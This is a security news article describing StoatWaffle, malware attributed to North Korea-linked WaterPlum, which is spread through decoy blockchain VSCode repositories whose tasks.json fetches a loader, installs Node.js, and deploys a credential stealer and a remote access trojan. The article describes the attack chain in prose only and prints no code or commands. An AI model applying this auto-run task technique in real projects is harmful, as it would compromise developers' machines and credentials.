WaterPlum Launches New StoatWaffle Malware via VSCode-Themed Attack

North Korea-linked threat actor WaterPlum has introduced a highly evasive new malware strain called StoatWaffle. Operating under the well-known “Contagious Interview” campaign, a specific subgroup, Team 8, has recently shifted its attacking tactics.

Previously relying on the OtterCookie malware, this cluster began deploying StoatWaffle around December 2025. This sophisticated new attack vector specifically targets software developers by using malicious Visual Studio Code (VSCode) repositories as a trap.

The VSCode Attack Flow

According to JP Security, the attack begins when developers are lured into downloading a decoy project related to blockchain technology. The danger lies hidden inside the repository’s .vscode directory, which contains a specially crafted tasks.json file.

Once triggered, the task initiates a stealthy download from a web application hosted on Vercel.

While this behavior is cross-platform, on Windows, the initial data is a simple downloader executed from the command prompt. This initial script immediately fetches a subsequent batch file named vscode-bootstrap.cmd.

The bootstrap script follows a precise sequence to prepare the victim’s machine for the final payload:

• It checks the host system to verify if Node.js is currently installed.
• If the runtime is missing, it automatically downloads and installs Node.js directly from the official website.
• The script then retrieves two configuration files named env.npl and package.json.
• It executes the env.npl file using the newly installed Node.js environment to launch the malware.

Inside The StoatWaffle Malware

The env.npl script functions as the primary loader for the StoatWaffle malware. Once active, it continuously polls the command and control server by connecting to a specific error message endpoint every five seconds.

If the server returns an error status, the script executes the retrieved message as hidden Node.js code. After approximately five minutes of continuous polling, a second downloader is retrieved and activated.

This secondary script connects to a different error-handling endpoint, maintaining the five-second polling cycle to fetch and execute further instructions.

This rapid communication sequence quickly deploys StoatWaffle’s two main components: a Stealer module and a Remote Access Trojan (RAT). The Stealer module is highly specialized for extracting sensitive information from development environments.

It targets credentials and extension data stored in Chromium and Firefox browsers, aggressively scanning Firefox configuration files for specific targeted keywords.

On macOS systems, the Stealer expands its reach by harvesting the entire Keychain database to capture stored passwords.

Finally, the deployed RAT module secures a persistent backdoor into the compromised machine. It regularly communicates with the server to request new tasks from a designated socket endpoint.

Once security it receives and executes these commands, it submits the technical execution results to a results endpoint, enabling WaterPlum to maintain continuous, reliable remote control over the developer’s system.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.

The post WaterPlum Launches New StoatWaffle Malware via VSCode-Themed Attack appeared first on Cyber Security News.